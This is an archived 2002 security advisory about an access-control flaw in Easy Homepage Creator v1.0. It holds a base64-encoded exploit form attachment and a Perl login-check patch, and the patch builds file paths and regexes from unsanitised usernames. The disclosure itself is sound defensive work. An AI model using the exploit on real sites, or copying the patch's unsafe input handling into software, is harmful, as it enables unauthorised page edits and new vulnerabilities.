29th Jul 2002 [SBWID-5567]
COMMAND
Easy Homepage Creator priviledge escalation
SYSTEMS AFFECTED
Advanced Easy Homepage Creator v1.0
Easy Homepage Creator v1.0
PROBLEM
In AresU advisory [http://bosen.net/advisories/aresu-adv.001.txt] :
Everyone can change another user homepage without Access Validation
easily.
Exploit :
=======
Change action in the html form.
Content-Transfer-Encoding: base64
Content-Description: easyhomepage.zip
Content-Disposition: attachment; filename="easyhomepage.zip"
UEsDBBQAAAAIAIMS/CwdaBQXdwIAAEQEAAARAAAAZWFzeWhvbWVwYWdlLmh0
bWyNU1Fr20AMfjfsP2iGwQaOnXQPzYIdyLZmXWnX0KaFPpXznRoftX3mTpc0
+/XTOfEKY4z5yZI/Sd/3Sc7fjkYQnQm3h3PTYCc2CF8sCjIW7n3dohWlrjXt
IYq+CkLonxlc+HoPk2kCJ+PxCUS3uEUbUPzpXG8qeL8yzumyRiADqDRBg02J
FqrjlA9ctHeEjYPF0xNKQjWDCI7PQm1FK1HB35ltJ+n4FfwvTHSPreLo7uZy
BhVRN8uy3W6XItc4aXVHLpUm9c8QBbmw3nfIGr4TKIMOWkPgHcJCSnQO7kWt
lSBt2t+yBj0QLTxVPKm3Z2HR3UH0zSLSz4CdwWfjsE1grQ36fQK4PP2YwK14
1nShdyKBVjdqkcCSK6ulto4SWNQbw65WTQJXNl0JJdpNxNakrKYfcxRUhtZp
i5QJtdWOa9Blghv5ESfS8XiS0gu9idaVduCMtxJBGoXA4RNTRuVlr0rU0Hnb
cTu4/nH5EI1Gc7Ywr6ip57nEltByIq8m8/+4mDxjHKNJhDMojVVoizFIrOtO
KKXbTXHSR64TMkQT2GlFVRF/Gr+LQ+Xy+uaK74ZtVUW8ur5dx9CKBoveeCED
4yI+erDVHDfZsI4sYFK50aHRnUMbCmeQ67bzdOgS+2M6nudl0PVgPEjRHvZq
qOJrDZDXFZdYmx3bzprwhdhgAdbsXBFPTmPQzHFAPoYWR7J/JqWpuWI6DcRW
Nd8h/yLh6Pa8FxbrHEMd6BZ4PqY8KxuG9WYGouHGclIga+FcQaYbcgd1h3Tp
icKdcu8idr5swvCtqD2HZ0HhsL2BZ6D3OJBlTzJS8358v/MsLOMQh332b/1d
QPQLUEsBAhQAFAAAAAgAgxL8LB1oFBd3AgAARAQAABEAAAAAAAAAAQAgALaB
AAAAAGVhc3lob21lcGFnZS5odG1sUEsFBgAAAAABAAEAPwAAAKYCAAAAAA==
SOLUTION
Add Access Validation on "print_html_to_file" function. Add edit.cgi
with this code:
sub login_check
{
if ($FORM{'username'} eq "" or $FORM{'password'}
eq "")
{
dienice("Sorry, but you haven't entered a
Username or Password. Please press the 'back' button
on your browser to return to the login screen.");
}
$FORM{'username'} =~ tr/A-Z/a-z/;
$FORM{'password'} =~ tr/A-Z/a-z/;
open(PROFILE,"<$rootdir/profiles/$FORM{'username'}.pro")
|| dienice("Sorry, but you have entered an invalid
username or password. Please press the 'back' button
on your browser to return to the login form.");
@DATA = <PROFILE>;
chomp(@DATA);
if (!($FORM{'username'} eq "@DATA[1]" &&
$FORM{'password'} eq "@DATA[2]")
{
dienice("Sorry, but you have entered an
invalid username or password. Please press the 'back'
button on your browser to return to the Login Form and
try logging-in again.");
}
close(PROFILE);
open(CHECK_USERNAME,"<$rootdir/profiles/ban_users.dat")
|| dienice("Configuration Error! Unable to open
ban_users.dat file for reading. Please contact the
webmaster of this web site. The following error
occured : $!");
@check = <CHECK_USERNAME>;
chomp(@check);
close(CHECK_USERNAME);
foreach $line (@check)
{
if ($line =~ /$FORM{'username'}/gi)
{
dienice("Sorry, but you have been banned
from using the Homepage Creator. You should have been
sent an email explaining why you have been banned from
using the Homepage Creator. For more details contact
the webmaster of this web site.");
}
}
}
sub dienice
{
my($msg) = @_;
print <<EndHTML;
<html>
<head>
<title>Homepage Login Error</title>
</head>
<body bgcolor="$bg_colour"
link="$hyperlinks_colour" vlink="$hyperlinks_colour"
alink="$hyperlinks_colour">
<p align="center">$logo_url
$banner_url</p>
<hr color="$linebreakcolour">
<p align="left"><b> Homepage Login
Error</b></p>
<p align="left"><b>$msg</b></p>
<hr color="$linebreakcolour">
<p align="center"><b>) Copyright
<a href="http://www.easyscripts.co.uk">
Easy Scripts Archive</a> 2001. All Rights
Reserved.</b></p>
</body>
</html>
EndHTML
exit;
}
And on the first line of "print_html_to_file" function add this:
&login_check;
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
